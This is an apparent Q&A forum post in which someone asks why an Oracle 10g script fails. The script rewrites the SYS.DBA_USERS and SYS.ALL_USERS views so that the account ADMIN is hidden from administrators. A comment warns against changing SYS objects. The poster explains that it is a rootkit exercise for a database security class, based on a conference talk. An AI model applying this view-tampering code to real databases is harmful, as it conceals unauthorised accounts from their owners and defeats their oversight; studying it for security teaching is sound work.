# Oracle hide user from EM views

Tags: oracle, plsql, oracle10g, redhat, oracle-enterprise-manager

Oracle 10gr2. I'm trying to hide user ADMIN from Enterprise Manager SYS.DBA_USERS and SYS.ALL_USERS views. All through sqlplus / as sysdba.
I am using this code

```
EXECUTE DBMS_METADATA.SET_TRANSFORM_PARAM(DBMS_METADATA.SESSION_TRANSFORM,'STORAGE',false);
spool hd_source.sql;
select replace(cast(dbms_metadata.get_ddl('VIEW','DBA_USERS') as VARCHAR2(4000)),'where','where u.name !=''ADMIN'' and ') from dual union select '/' from dual;
select replace(cast(dbms_metadata.get_ddl('VIEW','ALL_USERS') as VARCHAR2(4000)),'where','where u.name !=''ADMIN'' and ') from dual union select '/' from dual;
spool off
@hd_source.sql
```

When executing this code through as @/home/oracle/Desktop/script.sql - I am getting [these errors](http://pastebin.com/YeSaE9Zg).
However at the end you can see that view is created - when checking through Enterprise manager - the ALL_USERS view was succesfully modified, although it raised last two SP2-0734 errors.

But the DBA_USERS changes raise the rest of the big list of errors and have no effect on the EM view.
The difference is insignificant between these two selects, but the first select doesn't work.
What could cause such a behaviour?
Thank you.

Comment: Do not change SYS.DBA_USERS and SYS.ALL_USERS, or anything in SYS for that matter.  Whatever problem you're trying to solve, this is almost certainly not a good solution.  This sounds like an [XY problem](http://meta.stackexchange.com/a/66378/175876) - what is the *real* problem that you're trying to solve?

Comment: the task is to write rootkit for oracle 10g for DBMS security class, and the code is from BlackHat 2006 speech. http://www.red-database-security.com/wp/oracle_rootkits_2.0.pdf